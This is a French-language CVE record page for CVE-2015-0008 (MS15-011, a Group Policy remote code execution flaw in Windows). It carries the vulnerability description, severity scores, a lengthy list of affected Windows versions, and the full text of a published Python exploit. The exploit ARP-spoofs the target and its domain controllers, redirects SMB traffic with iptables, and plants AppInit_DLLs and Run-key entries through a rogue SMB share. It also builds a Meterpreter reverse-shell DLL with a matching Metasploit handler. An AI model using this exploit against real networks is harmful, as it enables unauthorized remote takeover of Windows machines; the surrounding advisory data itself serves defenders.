CVE-2015-0008
Alerte pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Descriptions
The UNC implementation in Microsoft Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 does not include authentication from the server to the client, which allows remote attackers to execute arbitrary code by making crafted data available on a UNC share, as demonstrated by Group Policy data from a spoofed domain controller, aka "Group Policy Remote Code Execution Vulnerability."
Informations
Faiblesses connexes
| Nom de la faiblesse | Source | |
|---|---|---|
| Improper Access Control The product does not restrict or incorrectly restricts access to a resource from an unauthorized actor. |
Metrics
| Metric | Score | Sévérité | CVSS Vecteur | Source |
|---|---|---|---|---|
| V2 | 8.3 | AV:A/AC:L/Au:N/C:C/I:C/A:C | [email protected] |
EPSS
EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.
EPSS Score
Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.
EPSS Percentile
Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
Informations sur l'Exploit
Exploit Database EDB-ID : 47558
Date de publication : 2019-10-28 23:00 +00:00
Auteur : Thomas Zuk
EDB Vérifié : No
# Exploit Title: Microsoft Windows Server 2012 - 'Group Policy' Remote Code Execution
# Date: 2019-10-28
# Exploit Author: Thomas Zuk
# Version: Windows Server 2003, Windows Vista, Windows Server 2008, Windows 7, Windows Server 2008 R2, Windows 8, Windows Server 2012,
# Windows RT, Windows 8.1, Windows Server 2012 R2, and Windows RT 8.1
# Tested on: Windows 7 , Windows Server 2012
# CVE : CVE-2015-0008
# Type: Remote
# Platform: Windows
# Description: While there exists multiple advisories for the vulnerability and video demos of
# successful exploitation there is no public exploit-code for MS15-011 (CVE-2015-0008). This exploit code
# targets vulnerable systems in order to modify registry keys to disable SMB signing, achieve SYSTEM level
# remote code execution (AppInit_DLL) and a user level remote code execution (Run Keys).
#!/usr/bin/python3
import argparse
import os
import subprocess
import socket
import fcntl
import struct
# MS15-011 Exploit.
# For more information and any updates/additions this exploit see the following Git Repo: https://github.com/Freakazoidile/Exploit_Dev/tree/master/MS15-011
# Example usage: python3 ms15-011.py -t 172.66.10.2 -d 172.66.10.10 -i eth1
# Example usage with multiple DC's: python3 ms15-011.py -t 172.66.10.2 -d 172.66.10.10 -d 172.66.10.11 -d 172.66.10.12 -i eth1
# Questions @Freakazoidile on twitter or make an issue on the GitHub repo. Enjoy.
def arpSpoof(interface, hostIP, targetIP):
arpCmd = "arpspoof -i %s %s %s " % (interface, hostIP, targetIP)
arpArgs = arpCmd.split()
print("Arpspoofing: %s" % (arpArgs))
p = subprocess.Popen(arpArgs, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
def karmaSMB(hostIP):
print("reverting GptTmpl.inf from bak")
os.system("cp GptTmpl.inf.bak GptTmpl.inf")
appInit = 'MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\AppInit_DLLs=1,"\\\\%s\\SYSVOL\\share.dll"\r\n' % (hostIP)
CURunKey = 'MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Key=1,"rundll32.exe \\\\%s\\SYSVOL\\share.dll",1\r\n' % (hostIP)
f = open("GptTmpl.inf","a", encoding='utf-16le')
f.write(appInit)
f.write(CURunKey)
f.close()
path = os.getcwd()
fConfig = open("smb.conf","w")
fConfig.write("ini = "+path+"/gpt.ini\ninf = "+path+"/GptTmpl.inf\ndll = "+path+"/shell.dll\n")
fConfig.close()
karmaCmd = "python karmaSMB.py -config smb.conf -smb2support ./ "
os.system(karmaCmd)
def iptables_config(targetIP, hostIP):
print('[+] Running command: echo "1" > /proc/sys/net/ipv4/ip_forward')
print('[+] Running command: iptables -t nat -A PREROUTING -p tcp -s %s --destination-port 445 -j DNAT --to-destination %s' % (targetIP, hostIP))
print('[+] Running command: iptables -t nat -A PREROUTING -p tcp -s %s --destination-port 139 -j DNAT --to-destination %s' % (targetIP, hostIP))
print('[+] Running command: iptables -t nat -A POSTROUTING -j MASQUERADE')
os.system('echo "1" > /proc/sys/net/ipv4/ip_forward')
os.system('iptables -t nat -A PREROUTING -p tcp -s %s --destination-port 445 -j DNAT --to-destination %s' % (targetIP, hostIP))
os.system('iptables -t nat -A PREROUTING -p tcp -s %s --destination-port 139 -j DNAT --to-destination %s' % (targetIP, hostIP))
os.system('iptables -t nat -A POSTROUTING -j MASQUERADE')
def get_interface_address(ifname):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
return socket.inet_ntoa(fcntl.ioctl(s.fileno(), 0x8915, struct.pack('256s', bytes(ifname[:15], 'utf-8')))[20:24])
def generatePayload(lhost, lport):
print("generating payload(s) and metasploit resource file")
msfDll = "msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=%s lport=%s -f dll -o shell.dll" % (lhost, lport)
os.system(msfDll)
msfResource = "use multi/handler\nset payload windows/x64/meterpreter/reverse_tcp\nset lhost %s\nset lport %s\nset exitonsession false\nexploit -j\n" % (lhost, lport)
print("metasploit resource script: %s" % msfResource)
print ("metasploit resource script written to meta_resource.rc type 'msfconsole -r meta_resource.rc' to launch metasploit and stage a listener automatically")
file = open("meta_resource.rc", "w+")
file.write(msfResource)
file.close()
if __name__ == '__main__':
parser = argparse.ArgumentParser()
# Add arguments
parser.add_argument("-t", "--target_ip", help="The IP of the target machine vulnerable to ms15-011/14", required=True)
parser.add_argument("-d", "--domain_controller", help="The IP of the domain controller(s) in the target domain. Use this argument multiple times when multiple domain contollers are preset.\nE.G: -d 172.66.10.10 -d 172.66.10.11", action='append', required=True)
parser.add_argument("-i", "--interface", help="The interface to use. E.G eth0", required=True)
parser.add_argument("-l", "--lhost", help="The IP to listen for incoming connections on for reverse shell. This is optional, uses the IP from the provided interface by default. E.G 192.168.5.1", required=False)
parser.add_argument("-p", "--lport", help="The port to listen connections on for reverse shell. If not specified 4444 is used. E.G 443", required=False)
args = parser.parse_args()
# Check for KarmaSMB and GptTmpl.inf.bak, if missing download git repo with these files.
print ("checking for missing file(s)")
if not os.path.isfile("karmaSMB.py") and not os.path.isfile("GptTmpl.inf.bak"):
print("Requirements missing. Downloading required files from github")
os.system("git clone https://github.com/Freakazoidile/MS15-011-Files")
os.system("mv MS15-011-Files/* . && rm -rf MS15-011-Files/")
# Get the provided interfaces IP address
ipAddr = get_interface_address(args.interface)
if args.lhost is not None:
lhost = args.lhost
else:
lhost = ipAddr
if args.lport is not None:
lport = args.lport
else:
lport = '4444'
dcSpoof = ""
dcCommaList = ""
count = 0
# loop over the domain controllers, poison each and target the host IP
# create a comma separated list of DC's
# create a "-t" separate list of DC's for use with arpspoof
for dc in args.domain_controller:
dcSpoof += "-t %s " % (dc)
if count > 0:
dcCommaList += ",%s" % (dc)
else:
dcCommaList += "%s" % (dc)
arpSpoof(args.interface, dc, "-t %s" % (args.target_ip))
count += 1
# arpspoof the target and all of the DC's
arpSpoof(args.interface, args.target_ip, dcSpoof)
# generate payloads
generatePayload(lhost, lport)
# Setup iptables forwarding rules
iptables_config(args.target_ip, ipAddr)
#run Karmba SMB Server
karmaSMB(ipAddr)
print("Targeting %s by arp spoofing %s and domain controllers: %s " % (args.target_ip, args.target_ip, args.domain_controllers))
print("If you interupt/stop the exploit ensure you stop all instances of arpspoof and flush firewall rules!")
Products Mentioned
Configuraton 0
Microsoft>>Windows_7 >> Version -
- Microsoft>>Windows_7 >> Version - (Open CPE detail)
- Microsoft>>Windows_7 >> Version - (Open CPE detail)
- Microsoft>>Windows_7 >> Version - (Open CPE detail)
- Microsoft>>Windows_7 >> Version - (Open CPE detail)
- Microsoft>>Windows_7 >> Version - (Open CPE detail)
- Microsoft>>Windows_7 >> Version - (Open CPE detail)
- Microsoft>>Windows_7 >> Version - (Open CPE detail)
- Microsoft>>Windows_7 >> Version - (Open CPE detail)
- Microsoft>>Windows_7 >> Version - (Open CPE detail)
- Microsoft>>Windows_7 >> Version - (Open CPE detail)
- Microsoft>>Windows_7 >> Version - (Open CPE detail)
- Microsoft>>Windows_7 >> Version - (Open CPE detail)
- Microsoft>>Windows_7 >> Version - (Open CPE detail)
- Microsoft>>Windows_7 >> Version - (Open CPE detail)
- Microsoft>>Windows_7 >> Version - (Open CPE detail)
- Microsoft>>Windows_7 >> Version - (Open CPE detail)
- Microsoft>>Windows_7 >> Version - (Open CPE detail)
- Microsoft>>Windows_7 >> Version - (Open CPE detail)
- Microsoft>>Windows_7 >> Version - (Open CPE detail)
- Microsoft>>Windows_7 >> Version - (Open CPE detail)
- Microsoft>>Windows_7 >> Version - (Open CPE detail)
- Microsoft>>Windows_7 >> Version - (Open CPE detail)
- Microsoft>>Windows_7 >> Version - (Open CPE detail)
- Microsoft>>Windows_7 >> Version - (Open CPE detail)
- Microsoft>>Windows_7 >> Version - (Open CPE detail)
- Microsoft>>Windows_7 >> Version - (Open CPE detail)
- Microsoft>>Windows_7 >> Version - (Open CPE detail)
- Microsoft>>Windows_7 >> Version - (Open CPE detail)
- Microsoft>>Windows_7 >> Version - (Open CPE detail)
- Microsoft>>Windows_7 >> Version - (Open CPE detail)
- Microsoft>>Windows_7 >> Version - (Open CPE detail)
- Microsoft>>Windows_7 >> Version - (Open CPE detail)
- Microsoft>>Windows_7 >> Version - (Open CPE detail)
- Microsoft>>Windows_7 >> Version - (Open CPE detail)
- Microsoft>>Windows_7 >> Version - (Open CPE detail)
- Microsoft>>Windows_7 >> Version - (Open CPE detail)
- Microsoft>>Windows_7 >> Version - (Open CPE detail)
- Microsoft>>Windows_7 >> Version - (Open CPE detail)
- Microsoft>>Windows_7 >> Version - (Open CPE detail)
- Microsoft>>Windows_7 >> Version - (Open CPE detail)
- Microsoft>>Windows_7 >> Version - (Open CPE detail)
- Microsoft>>Windows_7 >> Version - (Open CPE detail)
- Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_8 >> Version -
- Microsoft>>Windows_8 >> Version - (Open CPE detail)
- Microsoft>>Windows_8 >> Version - (Open CPE detail)
- Microsoft>>Windows_8 >> Version - (Open CPE detail)
- Microsoft>>Windows_8 >> Version - (Open CPE detail)
- Microsoft>>Windows_8 >> Version - (Open CPE detail)
- Microsoft>>Windows_8 >> Version - (Open CPE detail)
- Microsoft>>Windows_8 >> Version - (Open CPE detail)
- Microsoft>>Windows_8 >> Version - (Open CPE detail)
- Microsoft>>Windows_8 >> Version - (Open CPE detail)
- Microsoft>>Windows_8 >> Version - (Open CPE detail)
- Microsoft>>Windows_8 >> Version - (Open CPE detail)
- Microsoft>>Windows_8 >> Version - (Open CPE detail)
- Microsoft>>Windows_8 >> Version - (Open CPE detail)
- Microsoft>>Windows_8 >> Version - (Open CPE detail)
Microsoft>>Windows_8.1 >> Version -
- Microsoft>>Windows_8.1 >> Version - (Open CPE detail)
- Microsoft>>Windows_8.1 >> Version - (Open CPE detail)
- Microsoft>>Windows_8.1 >> Version - (Open CPE detail)
- Microsoft>>Windows_8.1 >> Version - (Open CPE detail)
- Microsoft>>Windows_8.1 >> Version - (Open CPE detail)
- Microsoft>>Windows_8.1 >> Version - (Open CPE detail)
- Microsoft>>Windows_8.1 >> Version - (Open CPE detail)
- Microsoft>>Windows_8.1 >> Version - (Open CPE detail)
- Microsoft>>Windows_8.1 >> Version - (Open CPE detail)
- Microsoft>>Windows_8.1 >> Version - (Open CPE detail)
- Microsoft>>Windows_8.1 >> Version - (Open CPE detail)
- Microsoft>>Windows_8.1 >> Version - (Open CPE detail)
- Microsoft>>Windows_8.1 >> Version - (Open CPE detail)
- Microsoft>>Windows_8.1 >> Version - (Open CPE detail)
- Microsoft>>Windows_8.1 >> Version - (Open CPE detail)
- Microsoft>>Windows_8.1 >> Version - (Open CPE detail)
- Microsoft>>Windows_8.1 >> Version - (Open CPE detail)
- Microsoft>>Windows_8.1 >> Version - (Open CPE detail)
- Microsoft>>Windows_8.1 >> Version - (Open CPE detail)
- Microsoft>>Windows_8.1 >> Version - (Open CPE detail)
Microsoft>>Windows_rt >> Version -
- Microsoft>>Windows_rt >> Version - (Open CPE detail)
- Microsoft>>Windows_rt >> Version - (Open CPE detail)
Microsoft>>Windows_rt_8.1 >> Version -
- Microsoft>>Windows_rt_8.1 >> Version - (Open CPE detail)
- Microsoft>>Windows_rt_8.1 >> Version - (Open CPE detail)
- Microsoft>>Windows_rt_8.1 >> Version - (Open CPE detail)
Microsoft>>Windows_server_2003 >> Version -
- Microsoft>>Windows_server_2003 >> Version - (Open CPE detail)
- Microsoft>>Windows_server_2003 >> Version - (Open CPE detail)
- Microsoft>>Windows_server_2003 >> Version - (Open CPE detail)
- Microsoft>>Windows_server_2003 >> Version - (Open CPE detail)
- Microsoft>>Windows_server_2003 >> Version - (Open CPE detail)
- Microsoft>>Windows_server_2003 >> Version - (Open CPE detail)
- Microsoft>>Windows_server_2003 >> Version - (Open CPE detail)
- Microsoft>>Windows_server_2003 >> Version - (Open CPE detail)
- Microsoft>>Windows_server_2003 >> Version - (Open CPE detail)
- Microsoft>>Windows_server_2003 >> Version - (Open CPE detail)
- Microsoft>>Windows_server_2003 >> Version - (Open CPE detail)
- Microsoft>>Windows_server_2003 >> Version - (Open CPE detail)
- Microsoft>>Windows_server_2003 >> Version - (Open CPE detail)
- Microsoft>>Windows_server_2003 >> Version - (Open CPE detail)
- Microsoft>>Windows_server_2003 >> Version - (Open CPE detail)
- Microsoft>>Windows_server_2003 >> Version - (Open CPE detail)
- Microsoft>>Windows_server_2003 >> Version - (Open CPE detail)
- Microsoft>>Windows_server_2003 >> Version - (Open CPE detail)
- Microsoft>>Windows_server_2003 >> Version - (Open CPE detail)
- Microsoft>>Windows_server_2003 >> Version - (Open CPE detail)
Microsoft>>Windows_server_2008 >> Version -
- Microsoft>>Windows_server_2008 >> Version - (Open CPE detail)
- Microsoft>>Windows_server_2008 >> Version - (Open CPE detail)
- Microsoft>>Windows_server_2008 >> Version - (Open CPE detail)
- Microsoft>>Windows_server_2008 >> Version - (Open CPE detail)
- Microsoft>>Windows_server_2008 >> Version - (Open CPE detail)
- Microsoft>>Windows_server_2008 >> Version - (Open CPE detail)
- Microsoft>>Windows_server_2008 >> Version - (Open CPE detail)
- Microsoft>>Windows_server_2008 >> Version - (Open CPE detail)
- Microsoft>>Windows_server_2008 >> Version - (Open CPE detail)
- Microsoft>>Windows_server_2008 >> Version - (Open CPE detail)
- Microsoft>>Windows_server_2008 >> Version - (Open CPE detail)
- Microsoft>>Windows_server_2008 >> Version - (Open CPE detail)
- Microsoft>>Windows_server_2008 >> Version - (Open CPE detail)
- Microsoft>>Windows_server_2008 >> Version - (Open CPE detail)
- Microsoft>>Windows_server_2008 >> Version - (Open CPE detail)
- Microsoft>>Windows_server_2008 >> Version - (Open CPE detail)
- Microsoft>>Windows_server_2008 >> Version - (Open CPE detail)
- Microsoft>>Windows_server_2008 >> Version - (Open CPE detail)
- Microsoft>>Windows_server_2008 >> Version - (Open CPE detail)
- Microsoft>>Windows_server_2008 >> Version - (Open CPE detail)
- Microsoft>>Windows_server_2008 >> Version - (Open CPE detail)
- Microsoft>>Windows_server_2008 >> Version - (Open CPE detail)
- Microsoft>>Windows_server_2008 >> Version - (Open CPE detail)
- Microsoft>>Windows_server_2008 >> Version - (Open CPE detail)
- Microsoft>>Windows_server_2008 >> Version - (Open CPE detail)
- Microsoft>>Windows_server_2008 >> Version - (Open CPE detail)
- Microsoft>>Windows_server_2008 >> Version - (Open CPE detail)
- Microsoft>>Windows_server_2008 >> Version - (Open CPE detail)
- Microsoft>>Windows_server_2008 >> Version - (Open CPE detail)
- Microsoft>>Windows_server_2008 >> Version - (Open CPE detail)
- Microsoft>>Windows_server_2008 >> Version - (Open CPE detail)
- Microsoft>>Windows_server_2008 >> Version - (Open CPE detail)
- Microsoft>>Windows_server_2008 >> Version - (Open CPE detail)
- Microsoft>>Windows_server_2008 >> Version - (Open CPE detail)
- Microsoft>>Windows_server_2008 >> Version - (Open CPE detail)
- Microsoft>>Windows_server_2008 >> Version - (Open CPE detail)
- Microsoft>>Windows_server_2008 >> Version - (Open CPE detail)
- Microsoft>>Windows_server_2008 >> Version - (Open CPE detail)
- Microsoft>>Windows_server_2008 >> Version - (Open CPE detail)
- Microsoft>>Windows_server_2008 >> Version - (Open CPE detail)
- Microsoft>>Windows_server_2008 >> Version - (Open CPE detail)
- Microsoft>>Windows_server_2008 >> Version - (Open CPE detail)
- Microsoft>>Windows_server_2008 >> Version - (Open CPE detail)
- Microsoft>>Windows_server_2008 >> Version - (Open CPE detail)
Microsoft>>Windows_server_2008 >> Version r2
- Microsoft>>Windows_server_2008 >> Version r2 (Open CPE detail)
- Microsoft>>Windows_server_2008 >> Version r2 (Open CPE detail)
- Microsoft>>Windows_server_2008 >> Version r2 (Open CPE detail)
- Microsoft>>Windows_server_2008 >> Version r2 (Open CPE detail)
Microsoft>>Windows_server_2008 >> Version r2
- Microsoft>>Windows_server_2008 >> Version r2 (Open CPE detail)
- Microsoft>>Windows_server_2008 >> Version r2 (Open CPE detail)
- Microsoft>>Windows_server_2008 >> Version r2 (Open CPE detail)
- Microsoft>>Windows_server_2008 >> Version r2 (Open CPE detail)
Microsoft>>Windows_server_2012 >> Version -
- Microsoft>>Windows_server_2012 >> Version - (Open CPE detail)
- Microsoft>>Windows_server_2012 >> Version - (Open CPE detail)
- Microsoft>>Windows_server_2012 >> Version - (Open CPE detail)
- Microsoft>>Windows_server_2012 >> Version - (Open CPE detail)
- Microsoft>>Windows_server_2012 >> Version - (Open CPE detail)
- Microsoft>>Windows_server_2012 >> Version - (Open CPE detail)
- Microsoft>>Windows_server_2012 >> Version - (Open CPE detail)
- Microsoft>>Windows_server_2012 >> Version - (Open CPE detail)
- Microsoft>>Windows_server_2012 >> Version - (Open CPE detail)
- Microsoft>>Windows_server_2012 >> Version - (Open CPE detail)
- Microsoft>>Windows_server_2012 >> Version - (Open CPE detail)
Microsoft>>Windows_server_2012 >> Version r2
- Microsoft>>Windows_server_2012 >> Version r2 (Open CPE detail)
- Microsoft>>Windows_server_2012 >> Version r2 (Open CPE detail)
- Microsoft>>Windows_server_2012 >> Version r2 (Open CPE detail)
- Microsoft>>Windows_server_2012 >> Version r2 (Open CPE detail)
- Microsoft>>Windows_server_2012 >> Version r2 (Open CPE detail)
- Microsoft>>Windows_server_2012 >> Version r2 (Open CPE detail)
- Microsoft>>Windows_server_2012 >> Version r2 (Open CPE detail)
- Microsoft>>Windows_server_2012 >> Version r2 (Open CPE detail)
- Microsoft>>Windows_server_2012 >> Version r2 (Open CPE detail)
Microsoft>>Windows_vista >> Version -
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
References
https://docs.microsoft.com/en-us/security-updates/securitybulletins/2015/ms15-011
Tags : vendor-advisory, x_refsource_MS
Tags : vendor-advisory, x_refsource_MS
http://blogs.technet.com/b/srd/archive/2015/02/10/ms15-011-amp-ms15-014-hardening-group-policy.aspx
Tags : x_refsource_CONFIRM
Tags : x_refsource_CONFIRM
2024©
tesweb SA
